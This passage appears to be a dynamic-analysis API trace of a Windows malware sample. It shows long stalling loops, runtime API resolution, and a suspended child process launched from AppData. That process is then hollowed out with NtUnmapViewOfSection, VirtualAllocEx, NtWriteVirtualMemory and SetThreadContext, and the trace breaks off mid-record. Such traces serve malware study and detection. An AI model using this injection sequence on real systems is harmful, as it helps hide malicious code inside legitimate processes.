| out: pdwHandleCount=0x0) returned 0 [0147.940] GetSystemDefaultLangID () returned 0x2730409 [0147.940] GetThreadLocale () returned 0x409 [0147.940] GetCurrentProcess () returned 0xffffffff [0147.941] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.941] GetSystemDefaultLangID () returned 0x2730409 [0147.941] GetThreadLocale () returned 0x409 [0147.941] GetCurrentProcess () returned 0xffffffff [0147.941] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.941] GetSystemDefaultLangID () returned 0x2730409 [0147.941] GetThreadLocale () returned 0x409 [0147.941] GetCurrentProcess () returned 0xffffffff [0147.941] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.941] GetSystemDefaultLangID () returned 0x2730409 [0147.941] GetThreadLocale () returned 0x409 [0147.941] GetCurrentProcess () returned 0xffffffff [0147.941] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.941] GetSystemDefaultLangID () returned 0x2730409 [0147.941] GetThreadLocale () returned 0x409 [0147.941] GetCurrentProcess () returned 0xffffffff [0147.941] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.941] GetSystemDefaultLangID () returned 0x2730409 [0147.941] GetThreadLocale () returned 0x409 [0147.941] GetCurrentProcess () returned 0xffffffff [0147.941] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.941] GetSystemDefaultLangID () returned 0x2730409 [0147.941] GetThreadLocale () returned 0x409 [0147.941] GetCurrentProcess () returned 0xffffffff [0147.941] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.941] GetSystemDefaultLangID () returned 0x2730409 [0147.941] GetThreadLocale () returned 0x409 [0147.941] GetCurrentProcess () returned 0xffffffff [0147.941] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.941] GetSystemDefaultLangID () returned 0x2730409 [0147.941] GetThreadLocale () returned 0x409 [0147.942] GetCurrentProcess () returned 0xffffffff [0147.942] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.942] GetSystemDefaultLangID () returned 0x2730409 [0147.942] GetThreadLocale () returned 0x409 [0147.942] GetCurrentProcess () returned 0xffffffff [0147.942] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.942] GetSystemDefaultLangID () returned 0x2730409 [0147.942] GetThreadLocale () returned 0x409 [0147.942] GetCurrentProcess () returned 0xffffffff [0147.942] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.942] GetSystemDefaultLangID () returned 0x2730409 [0147.942] GetThreadLocale () returned 0x409 [0147.942] GetCurrentProcess () returned 0xffffffff [0147.942] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.942] GetSystemDefaultLangID () returned 0x2730409 [0147.942] GetThreadLocale () returned 0x409 [0147.942] GetCurrentProcess () returned 0xffffffff [0147.942] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.942] GetSystemDefaultLangID () returned 0x2730409 [0147.942] GetThreadLocale () returned 0x409 [0147.942] GetCurrentProcess () returned 0xffffffff [0147.942] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.942] GetSystemDefaultLangID () returned 0x2730409 [0147.942] GetThreadLocale () returned 0x409 [0147.942] GetCurrentProcess () returned 0xffffffff [0147.942] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.942] GetSystemDefaultLangID () returned 0x2730409 [0147.942] GetThreadLocale () returned 0x409 [0147.942] GetCurrentProcess () returned 0xffffffff [0147.942] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.942] GetSystemDefaultLangID () returned 0x2730409 [0147.942] GetThreadLocale () returned 0x409 [0147.943] GetCurrentProcess () returned 0xffffffff [0147.943] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.943] GetSystemDefaultLangID () returned 0x2730409 [0147.943] GetThreadLocale () returned 0x409 [0147.943] GetCurrentProcess () returned 0xffffffff [0147.943] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.943] GetSystemDefaultLangID () returned 0x2730409 [0147.943] GetThreadLocale () returned 0x409 [0147.943] GetCurrentProcess () returned 0xffffffff [0147.943] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.943] GetSystemDefaultLangID () returned 0x2730409 [0147.943] GetThreadLocale () returned 0x409 [0147.943] GetCurrentProcess () returned 0xffffffff [0147.943] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.943] GetSystemDefaultLangID () returned 0x2730409 [0147.943] GetThreadLocale () returned 0x409 [0147.943] GetCurrentProcess () returned 0xffffffff [0147.943] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.943] GetSystemDefaultLangID () returned 0x2730409 [0147.943] GetThreadLocale () returned 0x409 [0147.943] GetCurrentProcess () returned 0xffffffff [0147.943] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.943] GetSystemDefaultLangID () returned 0x2730409 [0147.943] GetThreadLocale () returned 0x409 [0147.943] GetCurrentProcess () returned 0xffffffff [0147.943] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.943] GetSystemDefaultLangID () returned 0x2730409 [0147.943] GetThreadLocale () returned 0x409 [0147.943] GetCurrentProcess () returned 0xffffffff [0147.943] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.943] GetSystemDefaultLangID () returned 0x2730409 [0147.943] GetThreadLocale () returned 0x409 [0147.943] GetCurrentProcess () returned 0xffffffff [0147.943] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.944] GetSystemDefaultLangID () returned 0x2730409 [0147.944] GetThreadLocale () returned 0x409 [0147.944] GetCurrentProcess () returned 0xffffffff [0147.944] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.944] GetSystemDefaultLangID () returned 0x2730409 [0147.944] GetThreadLocale () returned 0x409 [0147.944] GetCurrentProcess () returned 0xffffffff [0147.944] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.944] GetSystemDefaultLangID () returned 0x2730409 [0147.944] GetThreadLocale () returned 0x409 [0147.944] GetCurrentProcess () returned 0xffffffff [0147.944] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.944] GetSystemDefaultLangID () returned 0x2730409 [0147.944] GetThreadLocale () returned 0x409 [0147.944] GetCurrentProcess () returned 0xffffffff [0147.944] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.944] GetSystemDefaultLangID () returned 0x2730409 [0147.944] GetThreadLocale () returned 0x409 [0147.944] GetCurrentProcess () returned 0xffffffff [0147.944] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.944] GetSystemDefaultLangID () returned 0x2730409 [0147.944] GetThreadLocale () returned 0x409 [0147.944] GetCurrentProcess () returned 0xffffffff [0147.944] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.944] GetSystemDefaultLangID () returned 0x2730409 [0147.944] GetThreadLocale () returned 0x409 [0147.944] GetCurrentProcess () returned 0xffffffff [0147.944] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.944] GetSystemDefaultLangID () returned 0x2730409 [0147.944] GetThreadLocale () returned 0x409 [0147.944] GetCurrentProcess () returned 0xffffffff [0147.944] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.944] GetSystemDefaultLangID () returned 0x2730409 [0147.944] GetThreadLocale () returned 0x409 [0147.944] GetCurrentProcess () returned 0xffffffff [0147.945] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.945] GetSystemDefaultLangID () returned 0x2730409 [0147.945] GetThreadLocale () returned 0x409 [0147.945] GetCurrentProcess () returned 0xffffffff [0147.945] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.945] GetSystemDefaultLangID () returned 0x2730409 [0147.945] GetThreadLocale () returned 0x409 [0147.945] GetCurrentProcess () returned 0xffffffff [0147.945] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.945] GetSystemDefaultLangID () returned 0x2730409 [0147.945] GetThreadLocale () returned 0x409 [0150.674] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0150.674] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0150.675] VirtualProtect (in: lpAddress=0x2741c30, dwSize=0xf490, flNewProtect=0x40, lpflOldProtect=0x19e838 | out: lpflOldProtect=0x19e838*=0x4) returned 1 [0150.693] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0150.693] GetProcAddress (hModule=0x76720000, lpProcName="GlobalAlloc") returned 0x76739950 [0150.693] GetProcAddress (hModule=0x76720000, lpProcName="GetLastError") returned 0x76733870 [0150.693] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0150.693] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0150.693] GetProcAddress (hModule=0x76720000, lpProcName="CreateToolhelp32Snapshot") returned 0x76747b50 [0150.694] GetProcAddress (hModule=0x76720000, lpProcName="Module32First") returned 0x767644b0 [0150.694] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0150.694] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xac [0150.697] Module32First (hSnapshot=0xac, lpme=0x19f1dc) returned 1 [0150.697] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x24d0000 [0150.698] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0150.699] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0 [0150.699] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageExtraInfo") returned 0x74403690 [0150.699] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0150.699] GetProcAddress (hModule=0x76720000, lpProcName="WinExec") returned 0x7675ff70 [0150.704] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileA") returned 0x76746880 [0150.704] GetProcAddress (hModule=0x76720000, lpProcName="WriteFile") returned 0x76746ca0 [0150.704] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0150.704] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessA") returned 0x76760750 [0150.704] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadContext") returned 0x7673ec60 [0150.704] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0150.705] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAllocEx") returned 0x76762730 [0150.705] GetProcAddress (hModule=0x76720000, lpProcName="VirtualFree") returned 0x76737600 [0150.705] GetProcAddress (hModule=0x76720000, lpProcName="ReadProcessMemory") returned 0x76761c80 [0150.705] GetProcAddress (hModule=0x76720000, lpProcName="WriteProcessMemory") returned 0x76762850 [0150.705] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadContext") returned 0x76762490 [0150.705] GetProcAddress (hModule=0x76720000, lpProcName="ResumeThread") returned 0x7673a800 [0150.705] GetProcAddress (hModule=0x76720000, lpProcName="WaitForSingleObject") returned 0x76746820 [0150.705] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleFileNameA") returned 0x7673a720 [0150.705] GetProcAddress (hModule=0x76720000, lpProcName="GetCommandLineA") returned 0x7673ab60 [0150.705] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x771d0000 [0150.706] GetProcAddress (hModule=0x771d0000, lpProcName="NtUnmapViewOfSection") returned 0x77246f40 [0150.706] GetProcAddress (hModule=0x771d0000, lpProcName="NtWriteVirtualMemory") returned 0x77247040 [0150.706] GetProcAddress (hModule=0x743d0000, lpProcName="RegisterClassExA") returned 0x74404e90 [0150.706] GetProcAddress (hModule=0x743d0000, lpProcName="CreateWindowExA") returned 0x74406f30 [0150.706] GetProcAddress (hModule=0x743d0000, lpProcName="PostMessageA") returned 0x743ff0e0 [0150.706] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageA") returned 0x743fe130 [0150.706] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcA") returned 0x7725aed0 [0150.706] GetProcAddress (hModule=0x76720000, lpProcName="GetFileAttributesA") returned 0x76746a20 [0150.707] GetProcAddress (hModule=0x76720000, lpProcName="GetStartupInfoA") returned 0x76739c10 [0150.707] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtectEx") returned 0x76762790 [0150.707] GetProcAddress (hModule=0x76720000, lpProcName="ExitProcess") returned 0x76747b30 [0150.707] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0150.709] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0150.710] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0150.710] RegisterClassExA (param_1=0x19ee98) returned 0xc1d9 [0150.715] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x3020c [0151.275] PostMessageA (hWnd=0x3020c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0151.541] GetMessageA (in: lpMsg=0x19eec8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19eec8) returned 1 [0151.542] GetMessageA (in: lpMsg=0x19eec8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19eec8) returned 1 [0151.542] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x24f0000 [0151.542] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f0000, nSize=0x2800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0151.542] GetStartupInfoA (in: lpStartupInfo=0x19edec | out: lpStartupInfo=0x19edec*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0151.542] GetCommandLineA () returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0151.543] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", lpCommandLine="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19edec*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x19ee44 | out: lpCommandLine="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", lpProcessInformation=0x19ee44*(hProcess=0x110, hThread=0x10c, dwProcessId=0xd30, dwThreadId=0xd34)) returned 1 [0157.321] VirtualFree (lpAddress=0x24f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.322] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x24f0000 [0157.323] GetThreadContext (in: hThread=0x10c, lpContext=0x24f0000 | out: lpContext=0x24f0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x37c000, Edx=0x0, Ecx=0x0, Eax=0x4164e7, Ebp=0x0, Eip=0x77248fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0166.596] ReadProcessMemory (in: hProcess=0x110, lpBaseAddress=0x37c008, lpBuffer=0x19ee38, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19ee38*, lpNumberOfBytesRead=0x0) returned 1 [0175.116] NtUnmapViewOfSection (ProcessHandle=0x110, BaseAddress=0x400000) returned 0x0 [0181.157] VirtualAllocEx (hProcess=0x110, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0181.162] NtWriteVirtualMemory (in: ProcessHandle=0x110, BaseAddress=0x400000, Buffer=0x24d15a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x24d15a0*, NumberOfBytesWritten=0x0) returned 0x0 [0181.165] NtWriteVirtualMemory (in: ProcessHandle=0x110, BaseAddress=0x401000, Buffer=0x24d17a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x24d17a0*, NumberOfBytesWritten=0x0) returned 0x0 [0181.170] WriteProcessMemory (in: hProcess=0x110, lpBaseAddress=0x37c008, lpBuffer=0x24d1654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x24d1654*, lpNumberOfBytesWritten=0x0) returned 1 [0181.174] SetThreadContext (hThread=0x10c, lpContext=0x24f0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, 